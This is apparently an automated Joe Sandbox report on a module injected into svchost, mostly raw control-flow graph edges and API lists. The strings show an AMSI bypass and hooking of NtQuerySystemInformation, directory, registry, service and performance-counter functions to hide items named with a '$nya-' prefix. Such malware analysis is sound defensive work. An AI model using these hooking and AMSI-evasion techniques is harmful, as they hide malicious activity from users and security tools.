8810->8809 8811->8809 8812->8809 8814 2a66130dce0 8812->8814 8817 2a66130dd38 FindClose 8813->8817 8822 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8813->8822 8816 2a66130dd0c FindClose 8814->8816 8820 2a661310b20 38 API calls 8814->8820 8815->8809 8816->8819 8821 2a66130dd1c 8816->8821 8818 2a66130dd48 8817->8818 8817->8819 8823 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8818->8823 8819->8795 8820->8816 8824 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8821->8824 8822->8817 8823->8819 8824->8819 8829 2a661310ed5 8825->8829 8826 
2a661310eda 8827 2a661310ef0 8826->8827 8828 2a66130d1f4 __std_exception_copy 13 API calls 8826->8828 8827->8714 8830 2a661310ee4 8828->8830 8829->8826 8829->8827 8832 2a661310f24 8829->8832 8831 2a66130d04c _invalid_parameter_noinfo 38 API calls 8830->8831 8831->8827 8832->8827 8833 2a66130d1f4 __std_exception_copy 13 API calls 8832->8833 8833->8830 8835 2a66130ef1f 8834->8835 8836 2a66130ef02 8834->8836 8838 2a66130ef29 8835->8838 8904 2a6613119f0 8835->8904 8836->8835 8837 2a66130ef10 8836->8837 8839 2a66130d1f4 __std_exception_copy 13 API calls 8837->8839 8911 2a661311a40 8838->8911 8841 2a66130ef15 8839->8841 8841->8748 8844 2a6613113e0 8843->8844 8845 2a6613113f5 8844->8845 8846 2a66131140e 8844->8846 8847 2a66130d1f4 __std_exception_copy 13 API calls 8845->8847 8849 2a66130dd78 14 API calls 8846->8849 8851 2a661311405 8846->8851 8848 2a6613113fa 8847->8848 8850 2a66130d04c _invalid_parameter_noinfo 38 API calls 8848->8850 8849->8851 8850->8851 8851->8749 8853 2a66130d336 8852->8853 8854 2a66130d35a 8852->8854 8857 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8853->8857 8861 2a66130d345 FindFirstFileExW 8853->8861 8855 2a66130d3bf 8854->8855 8856 2a66130d35f 8854->8856 8858 2a66130ec58 MultiByteToWideChar 8855->8858 8859 2a66130d374 8856->8859 8856->8861 8862 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8856->8862 8857->8861 8869 2a66130d3db 8858->8869 8863 2a66130c5d0 14 API calls 8859->8863 8860 2a66130d3e2 GetLastError 8864 2a66130d184 13 API calls 8860->8864 8861->8766 8861->8771 8862->8859 8863->8861 8867 2a66130d3ef 8864->8867 8865 2a66130d420 8865->8861 8866 2a66130ec58 MultiByteToWideChar 8865->8866 8870 2a66130d47a 8866->8870 8871 2a66130d1f4 __std_exception_copy 13 API calls 8867->8871 8868 2a66130d413 8873 2a66130c5d0 14 API calls 8868->8873 8869->8860 8869->8865 8869->8868 8872 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8869->8872 8870->8860 8870->8861 
8871->8861 8872->8868 8873->8865 8875 2a66130d4d6 8874->8875 8876 2a66130d4fa 8874->8876 8878 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8875->8878 8885 2a66130d4e5 8875->8885 8877 2a66130d55f 8876->8877 8881 2a66130d500 8876->8881 8879 2a66130ece8 WideCharToMultiByte 8877->8879 8878->8885 8891 2a66130d583 8879->8891 8880 2a66130d515 8884 2a66130c5d0 14 API calls 8880->8884 8881->8880 8883 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8881->8883 8881->8885 8882 2a66130d58a GetLastError 8886 2a66130d184 13 API calls 8882->8886 8883->8880 8884->8885 8885->8771 8889 2a66130d597 8886->8889 8887 2a66130d5c7 8887->8885 8888 2a66130ece8 WideCharToMultiByte 8887->8888 8893 2a66130d629 8888->8893 8894 2a66130d1f4 __std_exception_copy 13 API calls 8889->8894 8890 2a66130d5bb 8892 2a66130c5d0 14 API calls 8890->8892 8891->8882 8891->8887 8891->8890 8895 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8891->8895 8892->8887 8893->8882 8893->8885 8894->8885 8895->8890 8897 2a661310b52 8896->8897 8898 2a66130d1f4 __std_exception_copy 13 API calls 8897->8898 8903 2a661310b67 8897->8903 8899 2a661310b5c 8898->8899 8900 2a66130d04c _invalid_parameter_noinfo 38 API calls 8899->8900 8900->8903 8901 2a661308070 _invalid_parameter_noinfo 8 API calls 8902 2a661310ea8 8901->8902 8902->8779 8903->8901 8905 2a6613119f9 8904->8905 8906 2a661311a12 HeapSize 8904->8906 8907 2a66130d1f4 __std_exception_copy 13 API calls 8905->8907 8908 2a6613119fe 8907->8908 8909 2a66130d04c _invalid_parameter_noinfo 38 API calls 8908->8909 8910 2a661311a09 8909->8910 8910->8838 8912 2a661311a5f 8911->8912 8913 2a661311a55 8911->8913 8915 2a661311a64 8912->8915 8921 2a661311a6b __std_exception_copy 8912->8921 8914 2a66130c5d0 14 API calls 8913->8914 8919 2a661311a5d 8914->8919 8916 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8915->8916 8916->8919 8917 2a661311a9e HeapReAlloc 8917->8919 8917->8921 
8918 2a661311a71 8920 2a66130d1f4 __std_exception_copy 13 API calls 8918->8920 8919->8841 8920->8919 8921->8917 8921->8918 8922 2a66130b470 __std_exception_copy 2 API calls 8921->8922 8922->8921 8364 2a6613025dc 8366 2a66130265a 8364->8366 8365 2a661302777 8366->8365 8367 2a6613026bf GetFileType 8366->8367 8368 2a6613026cd StrCpyW 8367->8368 8369 2a6613026e1 8367->8369 8373 2a6613026ee 8368->8373 8375 2a661301ad4 GetFinalPathNameByHandleW 8369->8375 8373->8365 8380 2a661303f88 8373->8380 8383 2a661303708 StrCmpIW 8373->8383 8387 2a661301dd4 8373->8387 8376 2a661301b3d 8375->8376 8377 2a661301afe StrCmpNIW 8375->8377 8376->8373 8377->8376 8378 2a661301b18 lstrlenW 8377->8378 8378->8376 8379 2a661301b2a StrCpyW 8378->8379 8379->8376 8381 2a661303f95 StrCmpNIW 8380->8381 8382 2a661303faa 8380->8382 8381->8382 8382->8373 8384 2a66130373a StrCpyW StrCatW 8383->8384 8385 2a661303751 PathCombineW 8383->8385 8386 2a66130375a 8384->8386 8385->8386 8386->8373 8388 2a661301deb 8387->8388 8389 2a661301df4 8387->8389 8390 2a661301530 2 API calls 8388->8390 8389->8373 8390->8389 9129 2a66130f6dc 9130 2a66130f6e8 9129->9130 9132 2a66130f70f 9130->9132 9133 2a661311c0c 9130->9133 9134 2a661311c11 9133->9134 9138 2a661311c4c 9133->9138 9135 2a661311c32 DeleteCriticalSection 9134->9135 9136 2a661311c44 9134->9136 9135->9135 9135->9136 9137 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9136->9137 9137->9138 9138->9130 8923 2a66131465f 8924 2a661314677 8923->8924 8930 2a6613146e2 8923->8930 8925 2a661309324 __CxxCallCatchBlock 9 API calls 8924->8925 8924->8930 8926 2a6613146c4 8925->8926 8927 2a661309324 __CxxCallCatchBlock 9 API calls 8926->8927 8928 2a6613146d9 8927->8928 8929 2a66130c2f4 14 API calls 8928->8929 8929->8930 8931 2a66131485e 8932 2a661309324 __CxxCallCatchBlock 9 API calls 8931->8932 8933 2a66131486c 8932->8933 8934 2a661314877 8933->8934 8935 2a661309324 __CxxCallCatchBlock 9 API calls 8933->8935 8935->8934 7885 2a661307f60 7886 
2a661307f7c 7885->7886 7887 2a661307f81 7885->7887 7889 2a661308090 7886->7889 7890 2a661308127 7889->7890 7891 2a6613080b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7889->7891 7890->7887 7891->7890 7892 2a661313960 7902 2a661308ca0 7892->7902 7894 2a661313988 7896 2a661309324 __CxxCallCatchBlock 9 API calls 7897 2a661313998 7896->7897 7898 2a661309324 __CxxCallCatchBlock 9 API calls 7897->7898 7899 2a6613139a1 7898->7899 7906 2a66130c2f4 7899->7906 7904 2a661308cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 7902->7904 7903 2a661308dd1 7903->7894 7903->7896 7904->7903 7905 2a661308d94 RtlUnwindEx 7904->7905 7905->7904 7907 2a66130cab0 _invalid_parameter_noinfo 14 API calls 7906->7907 7908 2a66130c2fd 7907->7908 9139 2a6613106e0 9140 2a6613106e9 9139->9140 9141 2a6613106f9 9139->9141 9142 2a66130d1f4 __std_exception_copy 13 API calls 9140->9142 9143 2a6613106ee 9142->9143 9144 2a66130d04c _invalid_parameter_noinfo 38 API calls 9143->9144 9144->9141 8391 2a6613063e3 8392 2a6613063f0 8391->8392 8393 2a6613063fc GetThreadContext 8392->8393 8400 2a66130655a 8392->8400 8394 2a661306422 8393->8394 8393->8400 8399 2a661306449 8394->8399 8394->8400 8395 2a66130663e 8397 2a66130665e 8395->8397 8409 2a661304b20 8395->8409 8396 2a661306581 VirtualProtect FlushInstructionCache 8396->8400 8413 2a661305530 GetCurrentProcess 8397->8413 8402 2a6613064cd 8399->8402 8403 2a6613064a6 SetThreadContext 8399->8403 8400->8395 8400->8396 8403->8402 8404 2a661306677 ResumeThread 8406 2a661306663 8404->8406 8405 2a6613066b7 8407 2a661308070 _invalid_parameter_noinfo 8 API calls 8405->8407 8406->8404 8406->8405 8408 2a6613066ff 8407->8408 8411 2a661304b3c 8409->8411 8410 2a661304b9f 8410->8397 8411->8410 8412 2a661304b52 VirtualFree 8411->8412 8412->8411 8414 2a66130554c 8413->8414 8415 2a661305562 VirtualProtect FlushInstructionCache 8414->8415 8416 2a661305593 8414->8416 8415->8414 8416->8406 8417 
2a66130f3e4 8418 2a66130f41d 8417->8418 8419 2a66130f3ee 8417->8419 8419->8418 8420 2a66130f403 FreeLibrary 8419->8420 8420->8419 8421 2a6613133e4 8422 2a6613133fb 8421->8422 8423 2a6613133f5 CloseHandle 8421->8423 8423->8422 7918 2a66130ad48 7919 2a661309324 __CxxCallCatchBlock 9 API calls 7918->7919 7920 2a66130ad7d 7919->7920 7921 2a661309324 __CxxCallCatchBlock 9 API calls 7920->7921 7922 2a66130ad8b __except_validate_context_record 7921->7922 7923 2a661309324 __CxxCallCatchBlock 9 API calls 7922->7923 7924 2a66130adcf 7923->7924 7925 2a661309324 __CxxCallCatchBlock 9 API calls 7924->7925 7926 2a66130add8 7925->7926 7927 2a661309324 __CxxCallCatchBlock 9 API calls 7926->7927 7928 2a66130ade1 7927->7928 7941 2a66130993c 7928->7941 7931 2a661309324 __CxxCallCatchBlock 9 API calls 7932 2a66130ae11 __CxxCallCatchBlock 7931->7932 7948 2a661309978 7932->7948 7934 2a66130aeeb __CxxCallCatchBlock 7935 2a661309324 __CxxCallCatchBlock 9 API calls 7934->7935 7936 2a66130aefe 7935->7936 7937 2a661309324 __CxxCallCatchBlock 9 API calls 7936->7937 7940 2a66130af07 7937->7940 7942 2a661309324 __CxxCallCatchBlock 9 API calls 7941->7942 7943 2a66130994d 7942->7943 7944 2a661309958 7943->7944 7945 2a661309324 __CxxCallCatchBlock 9 API calls 7943->7945 7946 2a661309324 __CxxCallCatchBlock 9 API calls 7944->7946 7945->7944 7947 2a661309969 7946->7947 7947->7931 7947->7932 7949 2a661309324 __CxxCallCatchBlock 9 API calls 7948->7949 7950 2a66130998a 7949->7950 7951 2a6613099c5 7950->7951 7952 2a661309324 __CxxCallCatchBlock 9 API calls 7950->7952 7953 2a661309995 7952->7953 7953->7951 7954 2a661309324 __CxxCallCatchBlock 9 API calls 7953->7954 7955 2a6613099b6 7954->7955 7955->7934 7956 2a661308ff8 7955->7956 7957 2a661309324 __CxxCallCatchBlock 9 API calls 7956->7957 7958 2a661309006 7957->7958 7958->7934 8936 2a661314848 8939 2a66130904c 8936->8939 8940 2a661309076 8939->8940 8941 2a661309064 8939->8941 8942 2a661309324 __CxxCallCatchBlock 9 API calls 8940->8942 8941->8940 8943 
2a66130906c 8941->8943 8945 2a66130907b 8942->8945 8944 2a661309074 8943->8944 8946 2a661309324 __CxxCallCatchBlock 9 API calls 8943->8946 8945->8944 8948 2a661309324 __CxxCallCatchBlock 9 API calls 8945->8948 8947 2a66130909b 8946->8947 8949 2a661309324 __CxxCallCatchBlock 9 API calls 8947->8949 8948->8944 8950 2a6613090a8 8949->8950 8951 2a66130c2f4 14 API calls 8950->8951 8952 2a6613090b1 8951->8952 8953 2a66130c2f4 14 API calls 8952->8953 8954 2a6613090bd 8953->8954 8424 2a661305fcc 8425 2a661305fd3 8424->8425 8426 2a661306000 VirtualProtect 8425->8426 8427 2a661305f10 8425->8427 8426->8427 8428 2a661306029 GetLastError 8426->8428 8428->8427 8955 2a66130824c 8956 2a661308270 __scrt_release_startup_lock 8955->8956 8957 2a66130b581 8956->8957 8958 2a66130cb10 __std_exception_copy 13 API calls 8956->8958 8959 2a66130b5aa 8958->8959 7959 2a66131494f 7960 2a661314968 7959->7960 7961 2a66131495e 7959->7961 7963 2a66130c5ac LeaveCriticalSection 7961->7963 8429 2a6613119d0 8430 2a66130e864 56 API calls 8429->8430 8431 2a6613119d9 8430->8431 8960 2a661302e54 8962 2a661302ea8 8960->8962 8961 2a661302ec3 8962->8961 8964 2a6613037f4 8962->8964 8965 2a66130388a 8964->8965 8967 2a661303819 8964->8967 8965->8961 8966 2a661303f88 StrCmpNIW 8966->8967 8967->8965 8967->8966 8968 2a661301e08 StrCmpIW StrCmpW 8967->8968 8968->8967 9148 2a66130b0d4 9155 2a66130b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9148->9155 9149 2a66130b0fb 9150 2a661309324 __CxxCallCatchBlock 9 API calls 9149->9150 9151 2a66130b100 9150->9151 9152 2a661309324 __CxxCallCatchBlock 9 API calls 9151->9152 9153 2a66130b10b __FrameHandler3::GetHandlerSearchState 9151->9153 9152->9153 9154 2a6613099cc 9 API calls Is_bad_exception_allowed 9154->9155 9155->9149 9155->9153 9155->9154 9157 2a6613099f4 9155->9157 9158 2a661309324 __CxxCallCatchBlock 9 API calls 9157->9158 9159 2a661309a02 9158->9159 9159->9155 9160 2a6613034b8 9161 2a6613034e8 9160->9161 9162 2a6613035a1 9161->9162 9163 2a661303505 
PdhGetCounterInfoW 9161->9163 9163->9162 9164 2a661303523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 9163->9164 9165 2a66130358d GetProcessHeap HeapFree 9164->9165 9166 2a661303555 StrCmpW 9164->9166 9165->9162 9166->9165 9168 2a66130356a 9166->9168 9167 2a661303950 12 API calls 9167->9168 9168->9165 9168->9167 7467 2a661301e3c LoadLibraryA GetProcAddress 7468 2a661301e6f 7467->7468 7469 2a661301e62 SleepEx 7467->7469 7469->7469 8432 2a6613081c0 8433 2a6613081c9 __scrt_release_startup_lock 8432->8433 8434 2a6613081cd 8433->8434 8436 2a66130bbb4 8433->8436 8437 2a66130bbd4 8436->8437 8447 2a66130bbed 8436->8447 8438 2a66130bbdc 8437->8438 8439 2a66130bbf2 8437->8439 8441 2a66130d1f4 __std_exception_copy 13 API calls 8438->8441 8440 2a66130e864 56 API calls 8439->8440 8442 2a66130bbf7 8440->8442 8443 2a66130bbe1 8441->8443 8465 2a66130df38 GetModuleFileNameW 8442->8465 8445 2a66130d04c _invalid_parameter_noinfo 38 API calls 8443->8445 8445->8447 8447->8434 8452 2a66130bc69 8455 2a66130d1f4 __std_exception_copy 13 API calls 8452->8455 8453 2a66130bc7a 8454 2a66130b994 14 API calls 8453->8454 8457 2a66130bc96 8454->8457 8463 2a66130bc6e 8455->8463 8456 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8456->8447 8458 2a66130bcc6 8457->8458 8459 2a66130bcdf 8457->8459 8457->8463 8460 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8458->8460 8462 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8459->8462 8461 2a66130bccf 8460->8461 8464 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8461->8464 8462->8463 8463->8456 8464->8447 8466 2a66130df7d GetLastError 8465->8466 8467 2a66130df91 8465->8467 8489 2a66130d184 8466->8489 8469 2a66130dd78 14 API calls 8467->8469 8471 2a66130dfbf 8469->8471 8470 2a66130df8a 8472 2a661308070 _invalid_parameter_noinfo 8 API calls 8470->8472 8474 2a66130dfd0 8471->8474 8494 2a66130f198 8471->8494 8476 2a66130bc0e 8472->8476 8498 
2a66130de1c 8474->8498 8477 2a66130b994 8476->8477 8479 2a66130b9d2 8477->8479 8480 2a66130ba38 8479->8480 8515 2a66130ec1c 8479->8515 8481 2a66130bb25 8480->8481 8482 2a66130ec1c 14 API calls 8480->8482 8483 2a66130bb54 8481->8483 8482->8480 8484 2a66130bb6c 8483->8484 8488 2a66130bba4 8483->8488 8485 2a66130d220 __std_exception_copy 13 API calls 8484->8485 8484->8488 8486 2a66130bb9a 8485->8486 8487 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8486->8487 8487->8488 8488->8452 8488->8453 8512 2a66130d1d0 8489->8512 8491 2a66130d191 Concurrency::details::SchedulerProxy::DeleteThis 8492 2a66130d1f4 __std_exception_copy 13 API calls 8491->8492 8493 2a66130d1a1 8492->8493 8493->8470 8495 2a66130f1a9 8494->8495 8496 2a66130f1ca 8494->8496 8495->8496 8497 2a66130ef88 9 API calls 8495->8497 8496->8474 8497->8496 8499 2a66130de5b 8498->8499 8500 2a66130de40 8498->8500 8501 2a66130ece8 WideCharToMultiByte 8499->8501 8507 2a66130de60 8499->8507 8500->8470 8502 2a66130deb7 8501->8502 8504 2a66130debe GetLastError 8502->8504 8506 2a66130dee9 8502->8506 8502->8507 8503 2a66130d1f4 __std_exception_copy 13 API calls 8503->8500 8505 2a66130d184 13 API calls 8504->8505 8509 2a66130decb 8505->8509 8508 2a66130ece8 WideCharToMultiByte 8506->8508 8507->8500 8507->8503 8510 2a66130df10 8508->8510 8511 2a66130d1f4 __std_exception_copy 13 API calls 8509->8511 8510->8500 8510->8504 8511->8500 8513 2a66130cb10 __std_exception_copy 13 API calls 8512->8513 8514 2a66130d1d9 8513->8514 8514->8491 8516 2a66130eba8 8515->8516 8517 2a66130dd78 14 API calls 8516->8517 8518 2a66130ebcc 8517->8518 8518->8479 7964 2a66130ff40 7965 2a66130ff4b 7964->7965 7973 2a661312c24 7965->7973 7986 2a66130c558 EnterCriticalSection 7973->7986 8969 2a66130f440 GetProcessHeap 8519 2a6613147c2 8520 2a661309978 __CxxCallCatchBlock 9 API calls 8519->8520 8524 2a6613147d5 8520->8524 8521 2a661314814 __CxxCallCatchBlock 8522 2a661309324 __CxxCallCatchBlock 9 API calls 8521->8522 8523 
Control-flow graph data (node/edge list rendered as a graph on the original page) for several functions of the module mapped at 000002A661300000 inside svchost; the raw edge list is omitted here and only the functions and the imported APIs named in their graph nodes are kept:
• 2a661301bc4: loop that calls 2a661301724 and SleepEx, then compares strings with StrCmpIW/StrCmpW
• 2a661301724 (with helpers 2a6613012b8 and 2a66130104c): GetProcessHeap/HeapAlloc, chained RegOpenKeyExW, RegQueryInfoKeyW, RegEnumValueW, RegCloseKey, lstrlenW, StrCpyW, HeapFree
• 2a6613033a8 (with 2a661303950 and 2a661301a30): PdhGetCounterInfoW, StrCmpW, StrCmpNW, StrStrW, StrToIntW, OpenProcess, K32GetModuleFileNameExW, PathFindFileNameW, lstrlenW, StrCpyW, CloseHandle, StrCmpNIW
• 2a661306430: SetThreadContext, VirtualProtect, FlushInstructionCache, VirtualFree, ResumeThread
• 2a66130ec30: GetCommandLineA, GetCommandLineW
• 2a661302ab4: TlsGetValue, TlsSetValue, StrCmpNIW
• 2a66130ae42 and 2a66130aaac (CRT exception handling: __CxxCallCatchBlock, __FrameHandler3, Is_bad_exception_allowed, std::bad_alloc): RaiseException, RtlLookupFunctionEntry, RtlUnwindEx, EncodePointer
• 2a66130bd34 and 2a66130c828 (CRT runtime initialisation: __std_exception_copy, Concurrency::details::SchedulerProxy::DeleteThis, _invalid_parameter_noinfo): EnterCriticalSection, GetEnvironmentStringsW, FreeEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, FlsGetValue, GetOEMCP, GetACP, IsValidCodePage, GetCPInfo, HeapAlloc

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 1735320900-4225371247
                                                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction ID: 1d8c54a57d6576012f959ce61210d1bdffab2f1e7e04f858be4e63cfd44f8a1b
                                                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction Fuzzy Hash: 4F517FA4F10A4AA7EE00EBA4EE4E7D4336CA746F45F880523940B23165DF7C865EC382

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: AmsiScanBuffer$amsi.dll
                                                          • API String ID: 188063004-3248079830
                                                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction ID: c1ac5e7ad3bf4f070cb0e86cadc43a41dd63b8a78b66ff7892f0b8646b5409cd
                                                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction Fuzzy Hash: 24D06721F21600D7EE096B51E89E3583269AB67F41FCC1425C50F232A0DF2C895DC342

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 000002A661303A35
                                                          • PathFindFileNameW.SHLWAPI ref: 000002A661303A44
                                                            • Part of subcall function 000002A661303F88: StrCmpNIW.KERNELBASE(?,?,?,000002A66130272F), ref: 000002A661303FA0
                                                            • Part of subcall function 000002A661303EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002A661303A5B), ref: 000002A661303EDB
                                                            • Part of subcall function 000002A661303EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A661303A5B), ref: 000002A661303F0E
                                                            • Part of subcall function 000002A661303EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A661303A5B), ref: 000002A661303F2E
                                                            • Part of subcall function 000002A661303EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A661303A5B), ref: 000002A661303F47
                                                            • Part of subcall function 000002A661303EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A661303A5B), ref: 000002A661303F68
                                                          • CreateThread.KERNELBASE ref: 000002A661303A8B
                                                            • Part of subcall function 000002A661301E74: GetCurrentThread.KERNEL32 ref: 000002A661301E7F
                                                            • Part of subcall function 000002A661301E74: CreateThread.KERNELBASE ref: 000002A661302043
                                                            • Part of subcall function 000002A661301E74: TlsAlloc.KERNEL32 ref: 000002A661302049
                                                            • Part of subcall function 000002A661301E74: TlsAlloc.KERNEL32 ref: 000002A661302055
                                                            • Part of subcall function 000002A661301E74: TlsAlloc.KERNEL32 ref: 000002A661302061
                                                            • Part of subcall function 000002A661301E74: TlsAlloc.KERNEL32 ref: 000002A66130206D
                                                            • Part of subcall function 000002A661301E74: TlsAlloc.KERNEL32 ref: 000002A661302079
                                                            • Part of subcall function 000002A661301E74: TlsAlloc.KERNEL32 ref: 000002A661302085
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                          • String ID:
                                                          • API String ID: 2779030803-0
                                                          • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction ID: 9c889205013aa1f344880fe51b1c90f5b32aed787e9b3b341f17e014cbfa7cea
                                                          • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction Fuzzy Hash: C9114C35F20A418BFB60E720A54DB9922E8A797F57F5841299407A31D0EF7DC49C8682

                                                          Control-flow Graph

                                                          Control-flow graph (legend: Executed / Not Executed) for the function at 2a661303f88: a single StrCmpNIW call at 2a661303f95 whose result paths rejoin at 2a661303fad; the raw edge list is omitted here.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $nya-
                                                          • API String ID: 0-1266920357
                                                          • Opcode ID: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
                                                          • Instruction ID: 289fbf2455b5e5c93a4e915df526f1d2752526101905a9e540ef56bccb4f3004
                                                          • Opcode Fuzzy Hash: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
                                                          • Instruction Fuzzy Hash: 3FD05E60B216058BEB54DFA18CDDAA073A8AB15F05F4C4035D90213500DF5C898EC711
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000003.2183186665.000002A6612D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_3_2a6612d0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction ID: e242a0e5e891d3b9585325ebcd0ed74b4126737d0569d2fa288020d7ea7cd497
                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction Fuzzy Hash: 1D9100B2F0125187EB60CF25D408B69B3ADFB46F98F588120DE4947788DF38D886C701

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 000002A661301724: GetProcessHeap.KERNEL32 ref: 000002A66130172F
                                                            • Part of subcall function 000002A661301724: HeapAlloc.KERNEL32 ref: 000002A66130173E
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017AE
